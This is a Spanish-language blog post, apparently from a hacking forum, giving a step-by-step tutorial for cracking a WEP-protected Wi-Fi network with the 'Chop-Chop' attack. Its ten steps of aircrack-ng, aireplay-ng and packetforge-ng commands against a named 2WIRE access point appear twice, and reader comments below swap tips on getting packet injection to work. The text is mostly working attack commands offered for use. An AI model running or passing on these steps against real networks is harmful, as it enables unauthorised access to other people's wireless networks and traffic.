Tutorial: Ataque Chop-Chop
Bueno, esta tutorial me basare para los que ya saben crackear una wep, así que no me molestare en explicar como crackear una wep en este tutorial y los que no tengan ninguna idea aqui en el foro hay de como hacerlo en tal caso, de no entender puedes preguntar o simplemente les puedo hacer un tutorial, pero creo que los que hay en el foro soy muy entendibles. Quedo aclarar que el distro que use no fue nada menos que backtrack 3 Final.
Empecemos...
1.- checamos cual es nuestra interfase para poderlo en modo monitor:
airmon-ng
2.- como sabemos ponemos nuestra interface en modo monitor:
airmon-ng start
3.- ahora miramos que AP tenemos.
airodump-ng
4.- Como vemos nos aparecen algunas así que seleccionamos una, en este caso seleccionare 2WIREXXX.
airodump-ng c 6 -w lir -i
5.- Después nos asociamos:
aireplay-ng -1 0 -e 2WIRE -a 00:14:95:CE:2E:11 -h 00:11:22:33:44:55
6.- Ahora procedemos hacer el ataque Chop-Chop:
aireplay-ng -4 -b 00:14:95:CE:2E:11 -h 00:11:22:33:44:55
Le ponemos yes
7.- Usamos tcpdump para poder mirar la ip que nos interesa.
tcpdump -s 0 -n -e -r replay_dec-0920-161359.cap
8.- Creamos una petición de paquete arp usando el archivo .xor:
packetforge-ng -0 -a 00:14:95:ce:2e:11 -h 00:11:22:33:44:55 -k 192.168.1.140 -l 192.168.1.254 -y replay_dec-0920-161359.xor -w ddlr.cap
-l ip origen
-k ip destino
9.- Finalmente enviamos el recien creado paquete de peticion arp:
aireplay-ng -2 -r ddlr.cap
Le damos yes:
y empezara inyectar super rápido, te sorprenderás de la velocidad.
10.- Finalmente sacamos el password:
aircrack-ng lir-01.ivs
saludos cualquier duda no duden en preguntar :).
Posted on 11:06 by LIR and filed under | 7 Comments »
Empecemos...
1.- checamos cual es nuestra interfase para poderlo en modo monitor:
airmon-ng
2.- como sabemos ponemos nuestra interface en modo monitor:
airmon-ng start
3.- ahora miramos que AP tenemos.
airodump-ng
4.- Como vemos nos aparecen algunas así que seleccionamos una, en este caso seleccionare 2WIREXXX.
airodump-ng c 6 -w lir -i
5.- Después nos asociamos:
aireplay-ng -1 0 -e 2WIRE -a 00:14:95:CE:2E:11 -h 00:11:22:33:44:55
6.- Ahora procedemos hacer el ataque Chop-Chop:
aireplay-ng -4 -b 00:14:95:CE:2E:11 -h 00:11:22:33:44:55
Le ponemos yes
7.- Usamos tcpdump para poder mirar la ip que nos interesa.
tcpdump -s 0 -n -e -r replay_dec-0920-161359.cap
8.- Creamos una petición de paquete arp usando el archivo .xor:
packetforge-ng -0 -a 00:14:95:ce:2e:11 -h 00:11:22:33:44:55 -k 192.168.1.140 -l 192.168.1.254 -y replay_dec-0920-161359.xor -w ddlr.cap
-l ip origen
-k ip destino
9.- Finalmente enviamos el recien creado paquete de peticion arp:
aireplay-ng -2 -r ddlr.cap
Le damos yes:
y empezara inyectar super rápido, te sorprenderás de la velocidad.
10.- Finalmente sacamos el password:
aircrack-ng lir-01.ivs
saludos cualquier duda no duden en preguntar :).
7 comentarios:
ta weno, lo probare
hermano tengo un problema... jugando con este nuevo cacharro (Huawei HG520) por mas que intento no puedo obtener la clave WEP ... se qqueda inyectando (paso 9) aparece todo normal envia y todo, el problema esta en que los "#DATA" no se mueve y al momento de lanzar el aircrack solo reconoce muy pocos IVS (no mas de 50) ... ya use tmb "-3 -b " y nada, pueden enviarse hasta 100,000 packets. pero al momento de lanzar el aircrack, solo reconoce los 40 de la columna #data y con esos 40 IVs no saco nada xD... espero y me entiendas y puedas orientar... Gracias =D...
Excelente aporte amigo me hacia falta comprender como se hacia este tipo de ataque, muchas gracias.
hey buen aporte, luis tienes que checar si tu tarjeta soporta la inyección de paquetes y si la intensidad de la señal no es demasiado baja de ser así luego no logra capturar los data
Es casi lo nismo q wufiway y aparte em modo minitor es mas facil con " " pro ta chido
sencillo explicado. esta bueno
mejor es wifiway
Publicar un comentario